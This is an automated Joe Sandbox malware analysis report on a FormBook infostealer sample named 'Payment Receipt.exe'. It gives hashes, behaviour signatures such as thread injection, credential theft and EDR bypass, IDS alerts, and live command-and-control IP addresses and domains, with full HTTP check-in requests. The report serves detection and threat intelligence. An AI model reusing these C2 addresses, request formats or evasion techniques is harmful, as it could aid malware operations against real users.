Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Receipt.exe

Overview

General Information

Sample name:Payment Receipt.exe
Analysis ID:1583685
MD5:e6bd9e9d02f848789769edcf7023e15c
SHA1:f87837fe132810e33552511906bc35089c213f7b
SHA256:f7e7d1d597fa001cfdfdc86c9aa5c97578b110f3598a2c9fdb4158abe760acc2
Tags:exeuser-asdasdd
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Payment Receipt.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\Payment Receipt.exe" MD5: E6BD9E9D02F848789769EDCF7023E15C)
    • MEREhDqMRRNSzT.exe (PID: 4144 cmdline: "C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 6880 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • MEREhDqMRRNSzT.exe (PID: 1748 cmdline: "C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 4960 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Payment Receipt.exe.730000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T11:39:10.541104+010020507451Malware Command and Control Activity Detected192.168.2.450050154.39.239.23780TCP
              2025-01-03T11:39:44.159101+010020507451Malware Command and Control Activity Detected192.168.2.44973647.83.1.9080TCP
              2025-01-03T11:40:07.550751+010020507451Malware Command and Control Activity Detected192.168.2.44982484.32.84.3280TCP
              2025-01-03T11:40:21.031425+010020507451Malware Command and Control Activity Detected192.168.2.449912104.21.18.17180TCP
              2025-01-03T11:40:34.899049+010020507451Malware Command and Control Activity Detected192.168.2.450004134.122.133.8080TCP
              2025-01-03T11:40:48.229476+010020507451Malware Command and Control Activity Detected192.168.2.450018199.192.21.16980TCP
              2025-01-03T11:41:01.916844+010020507451Malware Command and Control Activity Detected192.168.2.450022154.197.162.23980TCP
              2025-01-03T11:41:15.122175+010020507451Malware Command and Control Activity Detected192.168.2.45002684.32.84.3280TCP
              2025-01-03T11:41:29.157934+010020507451Malware Command and Control Activity Detected192.168.2.450030134.122.133.8080TCP
              2025-01-03T11:41:43.461990+010020507451Malware Command and Control Activity Detected192.168.2.45003447.83.1.9080TCP
              2025-01-03T11:41:56.688749+010020507451Malware Command and Control Activity Detected192.168.2.450038188.114.97.380TCP
              2025-01-03T11:42:18.010612+010020507451Malware Command and Control Activity Detected192.168.2.450042199.59.243.22880TCP
              2025-01-03T11:42:31.693060+010020507451Malware Command and Control Activity Detected192.168.2.45004613.228.81.3980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T11:39:10.541104+010028554651A Network Trojan was detected192.168.2.450050154.39.239.23780TCP
              2025-01-03T11:39:44.159101+010028554651A Network Trojan was detected192.168.2.44973647.83.1.9080TCP
              2025-01-03T11:40:07.550751+010028554651A Network Trojan was detected192.168.2.44982484.32.84.3280TCP
              2025-01-03T11:40:21.031425+010028554651A Network Trojan was detected192.168.2.449912104.21.18.17180TCP
              2025-01-03T11:40:34.899049+010028554651A Network Trojan was detected192.168.2.450004134.122.133.8080TCP
              2025-01-03T11:40:48.229476+010028554651A Network Trojan was detected192.168.2.450018199.192.21.16980TCP
              2025-01-03T11:41:01.916844+010028554651A Network Trojan was detected192.168.2.450022154.197.162.23980TCP
              2025-01-03T11:41:15.122175+010028554651A Network Trojan was detected192.168.2.45002684.32.84.3280TCP
              2025-01-03T11:41:29.157934+010028554651A Network Trojan was detected192.168.2.450030134.122.133.8080TCP
              2025-01-03T11:41:43.461990+010028554651A Network Trojan was detected192.168.2.45003447.83.1.9080TCP
              2025-01-03T11:41:56.688749+010028554651A Network Trojan was detected192.168.2.450038188.114.97.380TCP
              2025-01-03T11:42:18.010612+010028554651A Network Trojan was detected192.168.2.450042199.59.243.22880TCP
              2025-01-03T11:42:31.693060+010028554651A Network Trojan was detected192.168.2.45004613.228.81.3980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T11:39:59.788721+010028554641A Network Trojan was detected192.168.2.44977384.32.84.3280TCP
              2025-01-03T11:40:02.382659+010028554641A Network Trojan was detected192.168.2.44978884.32.84.3280TCP
              2025-01-03T11:40:05.143650+010028554641A Network Trojan was detected192.168.2.44980584.32.84.3280TCP
              2025-01-03T11:40:13.231825+010028554641A Network Trojan was detected192.168.2.449859104.21.18.17180TCP
              2025-01-03T11:40:15.808369+010028554641A Network Trojan was detected192.168.2.449875104.21.18.17180TCP
              2025-01-03T11:40:18.425050+010028554641A Network Trojan was detected192.168.2.449891104.21.18.17180TCP
              2025-01-03T11:40:27.236732+010028554641A Network Trojan was detected192.168.2.449953134.122.133.8080TCP
              2025-01-03T11:40:29.786086+010028554641A Network Trojan was detected192.168.2.449969134.122.133.8080TCP
              2025-01-03T11:40:32.362799+010028554641A Network Trojan was detected192.168.2.449988134.122.133.8080TCP
              2025-01-03T11:40:40.573071+010028554641A Network Trojan was detected192.168.2.450015199.192.21.16980TCP
              2025-01-03T11:40:43.116447+010028554641A Network Trojan was detected192.168.2.450016199.192.21.16980TCP
              2025-01-03T11:40:45.762531+010028554641A Network Trojan was detected192.168.2.450017199.192.21.16980TCP
              2025-01-03T11:40:54.204900+010028554641A Network Trojan was detected192.168.2.450019154.197.162.23980TCP
              2025-01-03T11:40:56.792856+010028554641A Network Trojan was detected192.168.2.450020154.197.162.23980TCP
              2025-01-03T11:40:59.463232+010028554641A Network Trojan was detected192.168.2.450021154.197.162.23980TCP
              2025-01-03T11:41:07.454582+010028554641A Network Trojan was detected192.168.2.45002384.32.84.3280TCP
              2025-01-03T11:41:10.011574+010028554641A Network Trojan was detected192.168.2.45002484.32.84.3280TCP
              2025-01-03T11:41:12.555308+010028554641A Network Trojan was detected192.168.2.45002584.32.84.3280TCP
              2025-01-03T11:41:21.487271+010028554641A Network Trojan was detected192.168.2.450027134.122.133.8080TCP
              2025-01-03T11:41:24.041121+010028554641A Network Trojan was detected192.168.2.450028134.122.133.8080TCP
              2025-01-03T11:41:26.596097+010028554641A Network Trojan was detected192.168.2.450029134.122.133.8080TCP
              2025-01-03T11:41:35.730610+010028554641A Network Trojan was detected192.168.2.45003147.83.1.9080TCP
              2025-01-03T11:41:38.276125+010028554641A Network Trojan was detected192.168.2.45003247.83.1.9080TCP
              2025-01-03T11:41:40.822991+010028554641A Network Trojan was detected192.168.2.45003347.83.1.9080TCP
              2025-01-03T11:41:49.027167+010028554641A Network Trojan was detected192.168.2.450035188.114.97.380TCP
              2025-01-03T11:41:51.582140+010028554641A Network Trojan was detected192.168.2.450036188.114.97.380TCP
              2025-01-03T11:41:54.160245+010028554641A Network Trojan was detected192.168.2.450037188.114.97.380TCP
              2025-01-03T11:42:10.330134+010028554641A Network Trojan was detected192.168.2.450039199.59.243.22880TCP
              2025-01-03T11:42:12.888933+010028554641A Network Trojan was detected192.168.2.450040199.59.243.22880TCP
              2025-01-03T11:42:15.456146+010028554641A Network Trojan was detected192.168.2.450041199.59.243.22880TCP
              2025-01-03T11:42:24.032658+010028554641A Network Trojan was detected192.168.2.45004313.228.81.3980TCP
              2025-01-03T11:42:26.620947+010028554641A Network Trojan was detected192.168.2.45004413.228.81.3980TCP
              2025-01-03T11:42:29.200835+010028554641A Network Trojan was detected192.168.2.45004513.228.81.3980TCP
              2025-01-03T11:42:38.776296+010028554641A Network Trojan was detected192.168.2.450047154.39.239.23780TCP
              2025-01-03T11:42:41.370252+010028554641A Network Trojan was detected192.168.2.450048154.39.239.23780TCP
              2025-01-03T11:42:43.950799+010028554641A Network Trojan was detected192.168.2.450049154.39.239.23780TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: Payment Receipt.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.gayhxi.info/k2i2/?1V=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&w0DDw=KH0hz6Avira URL Cloud: Label: malware
              Multi AV Scanner detection for submitted file
              Source: Payment Receipt.exeVirustotal: Detection: 62%Perma Link
              Source: Payment Receipt.exeReversingLabs: Detection: 71%
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.Payment Receipt.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: Payment Receipt.exeJoe Sandbox ML: detected
              Source: Payment Receipt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Payment Receipt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000002.4097527146.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000002.4097527146.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MEREhDqMRRNSzT.exe, 00000004.00000000.1941108983.00000000003CE000.00000002.00000001.01000000.00000005.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097025395.00000000003CE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: Payment Receipt.exe, 00000000.00000002.2016615336.000000000170E000.00000040.00001000.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1926428067.0000000001203000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1928236553.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.000000000314E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2018181889.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2016579747.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Payment Receipt.exe, Payment Receipt.exe, 00000000.00000002.2016615336.000000000170E000.00000040.00001000.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1926428067.0000000001203000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1928236553.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000005.00000002.4098206639.000000000314E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2018181889.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2016579747.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0081C870 FindFirstFileW,FindNextFileW,FindClose,5_2_0081C870
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax5_2_00809EC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi5_2_0080E4C7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h5_2_02E504CE
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h7_2_0000022E9D0F54CE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49788 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49824 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49824 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49859 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49875 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49891 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49988 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49969 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49912 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49912 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50038 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50046 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50042 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50004 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50004 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50050 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 154.39.239.237:80
              Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
              Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?1V=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?1V=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
